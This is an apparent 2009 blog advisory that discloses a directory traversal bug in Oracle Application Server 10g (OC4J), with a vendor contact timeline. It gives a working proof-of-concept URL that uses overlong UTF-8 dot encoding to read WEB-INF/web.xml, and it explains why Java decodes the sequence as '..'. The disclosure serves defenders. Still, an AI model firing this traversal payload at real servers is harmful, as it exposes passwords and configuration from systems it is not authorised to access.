Monday, January 19, 2009

Oracle Containers For Java Directory Traversal (OC4J) Oracle Application Server 10g ( Oracle HTTP Server

Server Version Info: Oracle-Application-Server-10g/ Oracle-HTTP-Server
PoC: http://OC4J/web-app/foobar/%c0%ae%c0%ae/WEB-INF/web.xml
Explaination: The "%c0%ae%c0%ae" is interpreted as: ".." because on Java's side: "%c0%ae" is interpreted as: "\uC0AE" that get's casted to an ASCII-LOW char, that is: ".".

You can read dangerous configuration information including passwords, users, paths, etc..
Discovered: 8/16/08
Vendor contacted: 8/16/08
Vendor response: 8/18/08
Vendor reproduced the issue: 9/10/08
Vendor last contact: 9/30/08
Public Disclosure: 1/19/09

Oracle security bug id: 7391479

For more information contact Oracle Security Team:

I really wanted to give a link to a patch, but I think it's better if this is known by sysadmins so they can filter this using an IDS.